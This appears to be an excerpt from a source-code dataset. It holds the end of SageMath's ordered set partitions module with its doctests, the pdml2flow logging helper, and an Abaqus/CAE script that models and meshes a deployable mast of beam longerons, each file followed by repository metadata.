[{1}, {2}, {3}, {4}]
sage: OS.last()
[{1, 2, 3, 4}]
sage: OS.random_element()
[{3}, {1}, {2}, {4}]
::
sage: OS = OrderedSetPartitions([1,2,3,4], [2,2]); OS
Ordered set partitions of {1, 2, 3, 4} into parts of size [2, 2]
sage: OS.cardinality()
6
sage: OS.first()
[{1, 2}, {3, 4}]
sage: OS.last()
[{3, 4}, {1, 2}]
sage: OS.list()
[[{1, 2}, {3, 4}],
[{1, 3}, {2, 4}],
[{1, 4}, {2, 3}],
[{2, 3}, {1, 4}],
[{2, 4}, {1, 3}],
[{3, 4}, {1, 2}]]
::
sage: OS = OrderedSetPartitions("cat")
sage: OS # py2
Ordered set partitions of {'a', 'c', 't'}
sage: OS # py3 random
Ordered set partitions of {'a', 't', 'c'}
sage: sorted(OS.list(), key=str)
[[{'a', 'c', 't'}],
[{'a', 'c'}, {'t'}],
[{'a', 't'}, {'c'}],
[{'a'}, {'c', 't'}],
[{'a'}, {'c'}, {'t'}],
[{'a'}, {'t'}, {'c'}],
[{'c', 't'}, {'a'}],
[{'c'}, {'a', 't'}],
[{'c'}, {'a'}, {'t'}],
[{'c'}, {'t'}, {'a'}],
[{'t'}, {'a', 'c'}],
[{'t'}, {'a'}, {'c'}],
[{'t'}, {'c'}, {'a'}]]
"""
@staticmethod
def __classcall_private__(cls, s=None, c=None):
"""
Choose the correct parent based upon input.
EXAMPLES::
sage: OrderedSetPartitions(4)
Ordered set partitions of {1, 2, 3, 4}
sage: OrderedSetPartitions(4, [1, 2, 1])
Ordered set partitions of {1, 2, 3, 4} into parts of size [1, 2, 1]
"""
if s is None:
if c is not None:
raise NotImplementedError("cannot specify 'c' without specifying 's'")
return OrderedSetPartitions_all()
if isinstance(s, (int, Integer)):
if s < 0:
raise ValueError("s must be non-negative")
s = frozenset(range(1, s+1))
else:
s = frozenset(s)
if c is None:
return OrderedSetPartitions_s(s)
if isinstance(c, (int, Integer)):
return OrderedSetPartitions_sn(s, c)
if c not in Compositions(len(s)):
raise ValueError("c must be a composition of %s"%len(s))
return OrderedSetPartitions_scomp(s, Composition(c))
def __init__(self, s):
"""
Initialize ``self``.
EXAMPLES::
sage: OS = OrderedSetPartitions(4)
sage: TestSuite(OS).run()
"""
self._set = s
Parent.__init__(self, category=FiniteEnumeratedSets())
def _element_constructor_(self, s):
"""
Construct an element of ``self`` from ``s``.
EXAMPLES::
sage: OS = OrderedSetPartitions(4)
sage: OS([[1,3],[2,4]])
[{1, 3}, {2, 4}]
"""
if isinstance(s, OrderedSetPartition):
raise ValueError("cannot convert %s into an element of %s"%(s, self))
return self.element_class(self, list(s))
Element = OrderedSetPartition
def __contains__(self, x):
"""
TESTS::
sage: OS = OrderedSetPartitions([1,2,3,4])
sage: all(sp in OS for sp in OS)
True
sage: [[1,2], [], [3,4]] in OS
False
sage: [Set([1,2]), Set([3,4])] in OS
True
sage: [set([1,2]), set([3,4])] in OS
Traceback (most recent call last):
...
TypeError: X (=...1, 2...) must be a Set
"""
#x must be a list
if not isinstance(x, (OrderedSetPartition, list, tuple)):
return False
#The total number of elements in the list
        #should be the same as the number in self._set
if sum(map(len, x)) != len(self._set):
return False
#Check to make sure each element of the list
#is a nonempty set
u = Set([])
for s in x:
if not s or not isinstance(s, (set, frozenset, Set_generic)):
return False
u = u.union(s)
#Make sure that the union of all the
#sets is the original set
if u != Set(self._set):
return False
return True
def from_finite_word(self, w):
r"""
Return the unique ordered set partition of `\{1, 2, \ldots, n\}` corresponding
to a word `w` of length `n`.
.. SEEALSO::
:meth:`Word.to_ordered_set_partition`
EXAMPLES::
sage: A = OrderedSetPartitions().from_finite_word('abcabcabd'); A
[{1, 4, 7}, {2, 5, 8}, {3, 6}, {9}]
sage: B = OrderedSetPartitions().from_finite_word([1,2,3,1,2,3,1,2,4])
sage: A == B
True
"""
# TODO: fix this if statement.
# In fact, what we need is for the underlying alphabet to be sortable.
if isinstance(w, (list, tuple, str, FiniteWord_class)):
return self.element_class(self, Words()(w).to_ordered_set_partition())
else:
raise ValueError("Something is wrong: `from_finite_word` expects an object of type list/tuple/str/Word representing a finite word, received {}.".format(str(w)))
class OrderedSetPartitions_s(OrderedSetPartitions):
"""
Class of ordered partitions of a set `S`.
"""
def _repr_(self):
"""
TESTS::
sage: OrderedSetPartitions([1,2,3,4])
Ordered set partitions of {1, 2, 3, 4}
"""
return "Ordered set partitions of %s" % Set(self._set)
def cardinality(self):
"""
EXAMPLES::
sage: OrderedSetPartitions(0).cardinality()
1
sage: OrderedSetPartitions(1).cardinality()
1
sage: OrderedSetPartitions(2).cardinality()
3
sage: OrderedSetPartitions(3).cardinality()
13
sage: OrderedSetPartitions([1,2,3]).cardinality()
13
sage: OrderedSetPartitions(4).cardinality()
75
sage: OrderedSetPartitions(5).cardinality()
541
"""
return sum([factorial(k)*stirling_number2(len(self._set), k)
for k in range(len(self._set)+1)])
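    # Worked example (added note): for a 3-element set the sum above is
    # 0!*S(3,0) + 1!*S(3,1) + 2!*S(3,2) + 3!*S(3,3) = 0 + 1 + 6 + 6 = 13,
    # the ordered Bell (Fubini) number, matching the doctest value.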
def __iter__(self):
"""
EXAMPLES::
sage: [ p for p in OrderedSetPartitions([1,2,3]) ]
[[{1}, {2}, {3}],
[{1}, {3}, {2}],
[{2}, {1}, {3}],
[{3}, {1}, {2}],
[{2}, {3}, {1}],
[{3}, {2}, {1}],
[{1}, {2, 3}],
[{2}, {1, 3}],
[{3}, {1, 2}],
[{1, 2}, {3}],
[{1, 3}, {2}],
[{2, 3}, {1}],
[{1, 2, 3}]]
"""
for x in Compositions(len(self._set)):
for z in OrderedSetPartitions(self._set, x):
yield self.element_class(self, z)
class OrderedSetPartitions_sn(OrderedSetPartitions):
def __init__(self, s, n):
"""
TESTS::
sage: OS = OrderedSetPartitions([1,2,3,4], 2)
sage: OS == loads(dumps(OS))
True
"""
OrderedSetPartitions.__init__(self, s)
self.n = n
def __contains__(self, x):
"""
TESTS::
sage: OS = OrderedSetPartitions([1,2,3,4], 2)
sage: all(sp in OS for sp in OS)
True
sage: OS.cardinality()
14
sage: len([x for x in OrderedSetPartitions([1,2,3,4]) if x in OS])
14
"""
return OrderedSetPartitions.__contains__(self, x) and len(x) == self.n
def __repr__(self):
"""
TESTS::
sage: OrderedSetPartitions([1,2,3,4], 2)
Ordered set partitions of {1, 2, 3, 4} into 2 parts
"""
return "Ordered set partitions of %s into %s parts" % (Set(self._set),
self.n)
def cardinality(self):
"""
Return the cardinality of ``self``.
The number of ordered partitions of a set of size `n` into `k`
parts is equal to `k! S(n,k)` where `S(n,k)` denotes the Stirling
number of the second kind.
EXAMPLES::
sage: OrderedSetPartitions(4,2).cardinality()
14
sage: OrderedSetPartitions(4,1).cardinality()
1
"""
return factorial(self.n) * stirling_number2(len(self._set), self.n)
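    # Worked example (added note): with a 4-element set and n = 2 parts this is
    # 2! * S(4, 2) = 2 * 7 = 14, matching the doctest value above.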
def __iter__(self):
"""
EXAMPLES::
sage: [ p for p in OrderedSetPartitions([1,2,3,4], 2) ]
[[{1, 2, 3}, {4}],
[{1, 2, 4}, {3}],
[{1, 3, 4}, {2}],
[{2, 3, 4}, {1}],
[{1, 2}, {3, 4}],
[{1, 3}, {2, 4}],
[{1, 4}, {2, 3}],
[{2, 3}, {1, 4}],
[{2, 4}, {1, 3}],
[{3, 4}, {1, 2}],
[{1}, {2, 3, 4}],
[{2}, {1, 3, 4}],
[{3}, {1, 2, 4}],
[{4}, {1, 2, 3}]]
"""
for x in Compositions(len(self._set),length=self.n):
for z in OrderedSetPartitions_scomp(self._set, x):
yield self.element_class(self, z)
class OrderedSetPartitions_scomp(OrderedSetPartitions):
def __init__(self, s, comp):
"""
TESTS::
sage: OS = OrderedSetPartitions([1,2,3,4], [2,1,1])
sage: OS == loads(dumps(OS))
True
"""
OrderedSetPartitions.__init__(self, s)
self.c = Composition(comp)
def __repr__(self):
"""
TESTS::
sage: OrderedSetPartitions([1,2,3,4], [2,1,1])
Ordered set partitions of {1, 2, 3, 4} into parts of size [2, 1, 1]
"""
return "Ordered set partitions of %s into parts of size %s" % (Set(self._set), self.c)
def __contains__(self, x):
"""
TESTS::
sage: OS = OrderedSetPartitions([1,2,3,4], [2,1,1])
sage: all(sp in OS for sp in OS)
True
sage: OS.cardinality()
12
sage: len([x for x in OrderedSetPartitions([1,2,3,4]) if x in OS])
12
"""
return OrderedSetPartitions.__contains__(self, x) and [len(z) for z in x] == self.c
def cardinality(self):
r"""
Return the cardinality of ``self``.
        The number of ordered set partitions of a set of size `k` with
composition shape `\mu` is equal to
.. MATH::
\frac{k!}{\prod_{\mu_i \neq 0} \mu_i!}.
EXAMPLES::
sage: OrderedSetPartitions(5,[2,3]).cardinality()
10
sage: OrderedSetPartitions(0, []).cardinality()
1
sage: OrderedSetPartitions(0, [0]).cardinality()
1
sage: OrderedSetPartitions(0, [0,0]).cardinality()
1
sage: OrderedSetPartitions(5, [2,0,3]).cardinality()
10
"""
return factorial(len(self._set)) / prod([factorial(i) for i in self.c])
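    # Worked example (added note): for a 5-element set and shape [2, 3] this is
    # 5! / (2! * 3!) = 120 / 12 = 10, matching the doctest value above.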
def __iter__(self):
"""
TESTS::
sage: [ p for p in OrderedSetPartitions([1,2,3,4], [2,1,1]) ]
[[{1, 2}, {3}, {4}],
[{1, 2}, {4}, {3}],
[{1, 3}, {2}, {4}],
[{1, 4}, {2}, {3}],
[{1, 3}, {4}, {2}],
[{1, 4}, {3}, {2}],
[{2, 3}, {1}, {4}],
[{2, 4}, {1}, {3}],
[{3, 4}, {1}, {2}],
[{2, 3}, {4}, {1}],
[{2, 4}, {3}, {1}],
[{3, 4}, {2}, {1}]]
sage: len(OrderedSetPartitions([1,2,3,4], [1,1,1,1]))
24
sage: [ x for x in OrderedSetPartitions([1,4,7], [3]) ]
[[{1, 4, 7}]]
sage: [ x for x in OrderedSetPartitions([1,4,7], [1,2]) ]
[[{1}, {4, 7}], [{4}, {1, 7}], [{7}, {1, 4}]]
sage: [ p for p in OrderedSetPartitions([], []) ]
[[]]
sage: [ p for p in OrderedSetPartitions([1], [1]) ]
[[{1}]]
Let us check that it works for large size (:trac:`16646`)::
sage: OrderedSetPartitions(42).first()
[{1}, {2}, {3}, {4}, {5}, {6}, {7}, {8}, {9}, {10}, {11}, {12},
{13}, {14}, {15}, {16}, {17}, {18}, {19}, {20}, {21}, {22}, {23},
{24}, {25}, {26}, {27}, {28}, {29}, {30}, {31}, {32}, {33}, {34},
{35}, {36}, {37}, {38}, {39}, {40}, {41}, {42}]
"""
comp = self.c
lset = [x for x in self._set]
l = len(self.c)
dcomp = [-1] + comp.descents(final_descent=True)
p = []
for j in range(l):
p += [j + 1] * comp[j]
for x in permutation.Permutations_mset(p):
res = permutation.to_standard(x).inverse()
res = [lset[x - 1] for x in res]
yield self.element_class(self, [Set(res[dcomp[i]+1:dcomp[i+1]+1])
for i in range(l)])
class OrderedSetPartitions_all(OrderedSetPartitions):
r"""
Ordered set partitions of `\{1, \ldots, n\}` for all
`n \in \ZZ_{\geq 0}`.
"""
def __init__(self):
"""
Initialize ``self``.
EXAMPLES::
sage: OS = OrderedSetPartitions()
sage: TestSuite(OS).run() # long time
"""
Parent.__init__(self, category=InfiniteEnumeratedSets())
def __iter__(self):
"""
Iterate over ``self``.
EXAMPLES::
sage: it = iter(OrderedSetPartitions())
sage: [next(it) for _ in range(10)]
[[], [{1}], [{1}, {2}], [{2}, {1}], [{1, 2}],
[{1}, {2}, {3}], [{1}, {3}, {2}], [{2}, {1}, {3}],
[{3}, {1}, {2}], [{2}, {3}, {1}]]
"""
n = 0
while True:
for X in OrderedSetPartitions(n):
yield self.element_class(self, list(X))
n += 1
def _element_constructor_(self, s):
"""
Construct an element of ``self`` from ``s``.
EXAMPLES::
sage: OS = OrderedSetPartitions()
sage: OS([[1,3],[2,4]])
[{1, 3}, {2, 4}]
"""
if isinstance(s, OrderedSetPartition):
gset = s.parent()._set
if gset == frozenset(range(1,len(gset)+1)):
return self.element_class(self, list(s))
raise ValueError("cannot convert %s into an element of %s"%(s, self))
return self.element_class(self, list(s))
def __contains__(self, x):
"""
TESTS::
sage: OS = OrderedSetPartitions([1,2,3,4])
sage: AOS = OrderedSetPartitions()
sage: all(sp in AOS for sp in OS)
True
sage: AOS.__contains__([[1,3], [4], [5,2]])
True
sage: AOS.__contains__([Set([1,3]), Set([4]), Set([5,2])])
True
sage: [Set([1,4]), Set([3])] in AOS
False
sage: [Set([1,3]), Set([4,2]), Set([2,5])] in AOS
False
sage: [Set([1,2]), Set()] in AOS
False
"""
if isinstance(x, OrderedSetPartition):
if x.parent() is self:
return True
gset = x.parent()._set
return gset == frozenset(range(1, len(gset)+1))
# x must be a list or a tuple
if not isinstance(x, (list, tuple)):
return False
# Check to make sure each element of the list is a nonempty set
if not all(s and isinstance(s, (set, frozenset, list, tuple, Set_generic)) for s in x):
return False
if not all(isinstance(s, (set, frozenset, Set_generic)) or len(s) == len(set(s)) for s in x):
return False
X = set(reduce(lambda A,B: A.union(B), x, set()))
return len(X) == sum(len(s) for s in x) and X == set(range(1,len(X)+1))
def _coerce_map_from_(self, X):
"""
Return ``True`` if there is a coercion map from ``X``.
EXAMPLES::
sage: OSP = OrderedSetPartitions()
sage: OSP._coerce_map_from_(OrderedSetPartitions(3))
True
sage: OSP._coerce_map_from_(OrderedSetPartitions(['a','b']))
False
"""
if X is self:
return True
if isinstance(X, OrderedSetPartitions):
return X._set == frozenset(range(1,len(X._set)+1))
return super(OrderedSetPartitions_all, self)._coerce_map_from_(X)
def _repr_(self):
"""
TESTS::
sage: OrderedSetPartitions()
Ordered set partitions
"""
return "Ordered set partitions"
class Element(OrderedSetPartition):
def _richcmp_(self, other, op):
"""
TESTS::
sage: OSP = OrderedSetPartitions()
sage: el1 = OSP([[1,3], [4], [2]])
sage: el2 = OSP([[3,1], [2], [4]])
sage: el1 == el1, el2 == el2, el1 == el2 # indirect doctest
(True, True, False)
sage: el1 <= el2, el1 >= el2, el2 <= el1 # indirect doctest
(False, True, True)
"""
return richcmp([sorted(s) for s in self],
[sorted(s) for s in other], op)
##########################################################
# Deprecations
class SplitNK(OrderedSetPartitions_scomp):
def __setstate__(self, state):
r"""
For unpickling old ``SplitNK`` objects.
TESTS::
sage: loads(b"x\x9ck`J.NLO\xd5K\xce\xcfM\xca\xccK,\xd1+.\xc8\xc9,"
....: b"\x89\xcf\xcb\xe6\n\x061\xfc\xbcA\xccBF\xcd\xc6B\xa6\xda"
....: b"Bf\x8dP\xa6\xf8\xbcB\x16\x88\x96\xa2\xcc\xbc\xf4b\xbd\xcc"
....: b"\xbc\x92\xd4\xf4\xd4\"\xae\xdc\xc4\xec\xd4x\x18\xa7\x905"
....: b"\x94\xd1\xb45\xa8\x90\r\xa8>\xbb\x90=\x03\xc85\x02r9J\x93"
....: b"\xf4\x00\xb4\xc6%f")
Ordered set partitions of {0, 1, 2, 3, 4} into parts of size [2, 3]
"""
self.__class__ = OrderedSetPartitions_scomp
n = state['_n']
k = state['_k']
OrderedSetPartitions_scomp.__init__(self, range(state['_n']), (k,n-k))
from sage.misc.persist import register_unpickle_override
register_unpickle_override("sage.combinat.split_nk", "SplitNK_nk", SplitNK)
| 33.044586
| 172
| 0.492161
|
a083b11e2f70f493ffad22134db53448a26f3c71
| 851
|
py
|
Python
|
pdml2flow/logging.py
|
Enteee/pdml2flow
|
2e5da6f03bc799f0e8ef77dd987031b969d4a5df
|
[
"Apache-2.0"
] | 12
|
2016-04-01T10:59:14.000Z
|
2022-01-27T04:05:43.000Z
|
pdml2flow/logging.py
|
Enteee/pdml2flow
|
2e5da6f03bc799f0e8ef77dd987031b969d4a5df
|
[
"Apache-2.0"
] | 16
|
2016-03-18T10:44:00.000Z
|
2019-08-12T05:52:24.000Z
|
pdml2flow/logging.py
|
Enteee/pdml2flow
|
2e5da6f03bc799f0e8ef77dd987031b969d4a5df
|
[
"Apache-2.0"
] | 2
|
2016-09-08T11:49:39.000Z
|
2020-09-09T04:39:15.000Z
|
# vim: set fenc=utf8 ts=4 sw=4 et :
import sys
from .conf import Conf
def debug(*args):
# import here because of circular dependencies
from .flow import Flow
if Conf.DEBUG:
print(
'[Debug: {}] '.format(
Flow.newest_overall_frame_time
),
*args,
file=Conf.OUT_DEBUG
)
def warning(*args):
# import here because of circular dependencies
from .flow import Flow
print(
'[Warning: {}] '.format(
Flow.newest_overall_frame_time
),
*args,
file=Conf.OUT_WARNING
)
def error(*args):
# import here because of circular dependencies
from .flow import Flow
print(
'[Error: {}] '.format(
Flow.newest_overall_frame_time
),
*args,
file=Conf.OUT_ERROR
)
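# Minimal usage sketch (added for illustration, not part of the original module).
# It assumes Conf has been configured by the caller; debug() only prints when
# Conf.DEBUG is truthy, while warning() and error() always print to their streams.
def _usage_example():
    debug('parsed frame', 42)        # -> [Debug: <frame time>]  parsed frame 42
    warning('missing attribute')     # -> [Warning: <frame time>]  missing attribute
    error('could not decode pdml')   # -> [Error: <frame time>]  could not decode pdml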
| 21.275
| 50
| 0.553467
|
98550c3d67773465e204b8e565e9aed335e86437
| 16,853
|
py
|
Python
|
sample_data/Set-PD-Ix-100/3_Analyses/DOE_Ix-PD-100/Input_point1/Imperfection_point1/DoE_point72/script_DoE72_meshing.py
|
hanklu2020/mabessa_F3DAS
|
57b1bd1cb85d96567ad1044c216535ab3df88db3
|
[
"BSD-3-Clause"
] | null | null | null |
sample_data/Set-PD-Ix-100/3_Analyses/DOE_Ix-PD-100/Input_point1/Imperfection_point1/DoE_point72/script_DoE72_meshing.py
|
hanklu2020/mabessa_F3DAS
|
57b1bd1cb85d96567ad1044c216535ab3df88db3
|
[
"BSD-3-Clause"
] | null | null | null |
sample_data/Set-PD-Ix-100/3_Analyses/DOE_Ix-PD-100/Input_point1/Imperfection_point1/DoE_point72/script_DoE72_meshing.py
|
hanklu2020/mabessa_F3DAS
|
57b1bd1cb85d96567ad1044c216535ab3df88db3
|
[
"BSD-3-Clause"
] | null | null | null |
# Abaqus/CAE script
# Created by M.A. Bessa (M.A.Bessa@tudelft.nl) on 12-Nov-2019 05:29:40
#
from abaqus import *
from abaqusConstants import *
session.viewports['Viewport: 1'].makeCurrent()
#session.viewports['Viewport: 1'].maximize()
from caeModules import *
from driverUtils import executeOnCaeStartup
executeOnCaeStartup()
Mdb()
#
import numpy
#------------------------------------------------------------
os.chdir(r'/home/gkus/F3DAS-master/3_Analyses/DOE_Ix-PD-100/Input_point1/Imperfection_point1/DoE_point72')
#
#-------------------------------------------------------------
# Parameters:
VertexPolygon = 3 # Number of vertices (sides) of the polygon base
power = 1.00000e+00 # Power law exponent establishing the evolution of the spacing between battens
MastDiameter = 1.00000e+02 # Radius of the circumscribing circle of the polygon
nStories = 1 # Number of stories in HALF of the strut (i.e. in a single AstroMast!)
MastPitch = 9.39469e+01 # Pitch length of the strut (i.e. a single AstroMast!)
pinned_joints = 1 # (1 = batten are pinned to longerons, 0 = battens and longerons are a solid piece)
Longeron_CS = 1.00007e+01 # (Cross Section of the longeron)
Ix = 1.03996e+02 # (Second moment of area around X axis )
Iy = 7.50000e+01 # (Second moment of area around Y axis )
J = 2.50000e+02 # (Torsional constant)
Emodulus = 1.82600e+03 # (Young's Modulus)
Gmodulus = 6.57373e+02 # (Shear Modulus)
nu = 3.88861e-01 # (Poisson Ratio)
ConeSlope = 5.00000e-01 # Slope of the longerons (0 = straight, <0 larger at the top, >0 larger at the bottom)
Twist_angle = 0.00000e+00 # Do you want to twist the longerons?
transition_length_ratio = 1.00000e+00 # Transition zone for the longerons
#------------------------------------------------------------
MastRadius = MastDiameter/2.0
MastHeight = nStories*MastPitch
Mesh_size = min(MastRadius,MastPitch)/300.0
session.viewports['Viewport: 1'].setValues(displayedObject=None)
# Create all the joints of a single Deployable Mast:
joints = numpy.zeros((nStories+1,VertexPolygon,3))
joints_outter = numpy.zeros((nStories+1,VertexPolygon,3))
for iStorey in range(0,nStories+1,1):
for iVertex in range(0,VertexPolygon,1):
# Constant spacing between each storey (linear evolution):
Zcoord = MastHeight/nStories*iStorey
# Power-law spacing between each storey (more frequent at the fixed end):
# Zcoord = MastHeight*(float(iStorey)/float(nStories))**power
# Power-law spacing between each storey (more frequent at the rotating end):
# Zcoord = -MastHeight/(float(nStories)**power)*(float(nStories-iStorey)**power)+MastHeight
# Exponential spacing between each storey
# Zcoord =(MastHeight+1.0)/exp(float(nStories))*exp(float(iStorey))
#
Xcoord = MastRadius*cos(2.0*pi/VertexPolygon*iVertex + Twist_angle*min(Zcoord/MastHeight/transition_length_ratio,1.0))
Ycoord = MastRadius*sin(2.0*pi/VertexPolygon*iVertex + Twist_angle*min(Zcoord/MastHeight/transition_length_ratio,1.0))
# Save point defining this joint:
joints[iStorey,iVertex,:] = (Xcoord*(1.0-min(Zcoord,transition_length_ratio*MastHeight)/MastHeight*ConeSlope),Ycoord*(1.0-min(Zcoord,transition_length_ratio*MastHeight)/MastHeight*ConeSlope),Zcoord)
#
center = (0.0,0.0)
vec = joints[iStorey,iVertex,0:2]-center
norm_vec = numpy.linalg.norm(vec)
joints_outter[iStorey,iVertex,2] = joints[iStorey,iVertex,2]
joints_outter[iStorey,iVertex,0:2] = joints[iStorey,iVertex,0:2]
    # end iVertex loop
#end iStorey loop
# Create the longerons:
p_longerons = mdb.models['Model-1'].Part(name='longerons', dimensionality=THREE_D,
type=DEFORMABLE_BODY)
p_longerons = mdb.models['Model-1'].parts['longerons']
session.viewports['Viewport: 1'].setValues(displayedObject=p_longerons)
d_longerons, r_longerons = p_longerons.datums, p_longerons.referencePoints
LocalDatum_list = [] # List with local coordinate system for each longeron
long_midpoints = [] # List with midpoints of longerons (just to determine a set containing the longerons)
e_long = p_longerons.edges
for iVertex in range(0,VertexPolygon,1):
# First create local coordinate system (useful for future constraints, etc.):
iStorey=0
origin = joints[iStorey,iVertex,:]
point2 = joints[iStorey,iVertex-1,:]
name = 'Local_Datum_'+str(iVertex)
LocalDatum_list.append(p_longerons.DatumCsysByThreePoints(origin=origin, point2=point2, name=name,
coordSysType=CARTESIAN, point1=(0.0, 0.0, 0.0)))
#
# Then, create the longerons
templist = [] # List that will contain the points used to make each longeron
for iStorey in range(0,nStories+1,1):
templist.append(joints[iStorey,iVertex,:])
if iStorey != 0: # Save midpoints of bars
long_midpoints.append( [(joints[iStorey-1,iVertex,:]+joints[iStorey,iVertex,:])/2 , ])
# end if
# end iStorey loop
p_longerons.WirePolyLine(points=templist,
mergeType=IMPRINT, meshable=ON)
# Create set for each longeron (to assign local beam directions)
for i in range(0,len(templist)): # loop over longerons edges
if i == 0:
select_edges = e_long.findAt([templist[0], ]) # Find the first edge
else:
# Now find remaining edges in longerons
temp = e_long.findAt([templist[i], ])
select_edges = select_edges + temp
#end if
#end i loop
longeron_name = 'longeron-'+str(iVertex)+'_set'
p_longerons.Set(edges=select_edges, name=longeron_name)
#end for iVertex loop
# Longerons set:
e_long = p_longerons.edges
select_edges = []
for i in range(0,len(long_midpoints)): # loop over longerons edges
if i == 0:
select_edges = e_long.findAt(long_midpoints[0]) # Find the first edge
else:
# Now find remaining edges in longerons
temp = e_long.findAt(long_midpoints[i])
select_edges = select_edges + temp
#end if
#end i loop
p_longerons.Set(edges=select_edges, name='all_longerons_set')
all_longerons_set_edges = select_edges
p_longerons.Surface(circumEdges=all_longerons_set_edges, name='all_longerons_surface')
# Create a set with all the joints:
v_long = p_longerons.vertices
select_vertices = []
select_top_vertices = []
select_bot_vertices = []
for iStorey in range(0,nStories+1,1):
for iVertex in range(0,VertexPolygon,1):
# Select all the joints in the longerons:
current_joint = v_long.findAt( [joints[iStorey,iVertex,:] , ] ) # Find the first vertex
current_joint_name = 'joint-'+str(iStorey)+'-'+str(iVertex)
# Create a set for each joint:
p_longerons.Set(vertices=current_joint, name=current_joint_name)
#
if iStorey == 0 and iVertex == 0:
select_vertices = current_joint # Instantiate the first point in set
else:
            select_vertices = select_vertices + current_joint # Add this joint to the set
# endif iStorey == 0 and iVertex == 0
#
if iStorey == 0: # Also save the bottom nodes separately
if iVertex == 0:
# Start selecting the bottom joints for implementing the boundary conditions
select_bot_vertices = current_joint
else:
select_bot_vertices = select_bot_vertices + current_joint
# endif iStorey == 0:
elif iStorey == nStories: # Also save the top nodes separately
if iVertex == 0:
# Start selecting the top joints for implementing the boundary conditions
select_top_vertices = current_joint
else: # remaining vertices:
select_top_vertices = select_top_vertices + current_joint
#end if
#end iVertex loop
#end iStorey loop
p_longerons.Set(vertices=select_vertices, name='all_joints_set')
p_longerons.Set(vertices=select_bot_vertices, name='bot_joints_set')
p_longerons.Set(vertices=select_top_vertices, name='top_joints_set')
#
# Create materials:
mdb.models['Model-1'].Material(name='NiTi_alloy')
mdb.models['Model-1'].materials['NiTi_alloy'].Elastic(table=((83.0E3, 0.31),
))
mdb.models['Model-1'].materials['NiTi_alloy'].Density(table=((1.0E-3, ), ))
mdb.models['Model-1'].Material(name='PC')
mdb.models['Model-1'].materials['PC'].Elastic(table=((2134, 0.27),
))
mdb.models['Model-1'].materials['PC'].Density(table=((1.19E-3, ), ))
mdb.models['Model-1'].Material(name='PLA')
mdb.models['Model-1'].materials['PLA'].Elastic(table=((Emodulus, nu),
))
mdb.models['Model-1'].materials['PLA'].Density(table=((1.24E-3, ), ))
mdb.models['Model-1'].Material(name='CNT')
mdb.models['Model-1'].materials['CNT'].Elastic(table=((1000.0E3, 0.3),
))
mdb.models['Model-1'].materials['CNT'].Density(table=((1.0E-3, ), ))
# Create beam profiles and beam sections:
mdb.models['Model-1'].GeneralizedProfile(name='LongeronsProfile', area=Longeron_CS, i11=Ix, i12=0.0, i22=Iy, j=J, gammaO=0.0, gammaW=0.0)
mdb.models['Model-1'].BeamSection(name='LongeronsSection', integration=
BEFORE_ANALYSIS, poissonRatio=0.31, beamShape=CONSTANT,
profile='LongeronsProfile', density=0.00124, thermalExpansion=OFF,
temperatureDependency=OFF, dependencies=0, table=((Emodulus, Gmodulus), ),
alphaDamping=0.0, betaDamping=0.0, compositeDamping=0.0, centroid=(0.0,
0.0), shearCenter=(0.0, 0.0), consistentMassMatrix=False)
# Assign respective sections:
p_longerons.SectionAssignment(offset=0.0,
offsetField='', offsetType=MIDDLE_SURFACE, region=
p_longerons.sets['all_longerons_set'],
sectionName='LongeronsSection', thicknessAssignment=FROM_SECTION)
# Assign beam orientation:
for iVertex in range(0,VertexPolygon,1):
iStorey=0
dir_vec_n1 = joints[iStorey,iVertex,:]-(0.,0.,0.) # Vector n1 perpendicular to the longeron tangent
longeron_name = 'longeron-'+str(iVertex)+'_set'
region=p_longerons.sets[longeron_name]
p_longerons.assignBeamSectionOrientation(region=region, method=N1_COSINES, n1=dir_vec_n1)
#end for iVertex
#
delta = Mesh_size/100.0
########################################################################
#Mesh the structure
#refPlane = p_longerons.DatumPlaneByPrincipalPlane(principalPlane=XYPLANE, offset=L/2)
#d = p.datums
#All_faces = facesLeafs+facesDoubleThickBoom
#p.PartitionFaceByDatumPlane(datumPlane=d[refPlane.id], faces=All_faces)
##
#session.viewports['Viewport: 1'].partDisplay.setValues(sectionAssignments=OFF
# engineeringFeatures=OFF, mesh=ON)
#session.viewports['Viewport: 1'].partDisplay.meshOptions.setValues(
# meshTechnique=ON)
#p = mdb.models['Model-1'].parts['reducedCF_TRAC_boom']
p_longerons.seedPart(size=Mesh_size, deviationFactor=0.04, minSizeFactor=0.001,
constraint=FINER)
p_longerons.seedEdgeBySize(edges=all_longerons_set_edges, size=Mesh_size, deviationFactor=0.04,
constraint=FINER)
elemType_longerons = mesh.ElemType(elemCode=B31, elemLibrary=STANDARD) # Element type
p_longerons.setElementType(regions=(all_longerons_set_edges, ), elemTypes=(elemType_longerons, ))
p_longerons.generateMesh()
#######################################################################
# Make Analytical surfaces for contact purposes
s1 = mdb.models['Model-1'].ConstrainedSketch(name='__profile__',
sheetSize=MastRadius*3.0)
g, v, d, c = s1.geometry, s1.vertices, s1.dimensions, s1.constraints
s1.setPrimaryObject(option=STANDALONE)
s1.Line(point1=(0.0, -MastRadius*1.1), point2=(0.0, MastRadius*1.1))
s1.VerticalConstraint(entity=g[2], addUndoState=False)
p_surf = mdb.models['Model-1'].Part(name='AnalyticSurf', dimensionality=THREE_D,
type=ANALYTIC_RIGID_SURFACE)
p_surf = mdb.models['Model-1'].parts['AnalyticSurf']
p_surf.AnalyticRigidSurfExtrude(sketch=s1, depth=MastRadius*2.2)
s1.unsetPrimaryObject()
rigid_face = p_surf.faces
#surf_select = f.findAt((0.0,MastRadius*1.05,0.0))
#surf_select = f[0]
p_surf.Surface(side1Faces=rigid_face, name='rigid_support')
#p_surf.Set(faces=surf_select, name='support_surface_set')
#p_surf.sets['all_diagonals_set']
#
# Make assembly:
a = mdb.models['Model-1'].rootAssembly
a.DatumCsysByDefault(CARTESIAN)
# Create reference points to assign boundary conditions
RP_ZmYmXm = a.ReferencePoint(point=(0.0, 0.0, -1.1*MastRadius))
refpoint_ZmYmXm = (a.referencePoints[RP_ZmYmXm.id],)
a.Set(referencePoints=refpoint_ZmYmXm, name='RP_ZmYmXm')
#
RP_ZpYmXm = a.ReferencePoint(point=(0.0, 0.0, MastHeight+1.1*MastRadius))
refpoint_ZpYmXm = (a.referencePoints[RP_ZpYmXm.id],)
a.Set(referencePoints=refpoint_ZpYmXm, name='RP_ZpYmXm')
#
# Create longerons
a_long = a.Instance(name='longerons-1-1', part=p_longerons, dependent=ON)
# Create bottom surface
a_surf_bot = a.Instance(name='AnalyticSurf-1-1', part=p_surf, dependent=ON)
# Now rotate the plane to have the proper direction
a.rotate(instanceList=('AnalyticSurf-1-1', ), axisPoint=(0.0, 0.0, 0.0),
axisDirection=(0.0, 1.0, 0.0), angle=90.0)
#
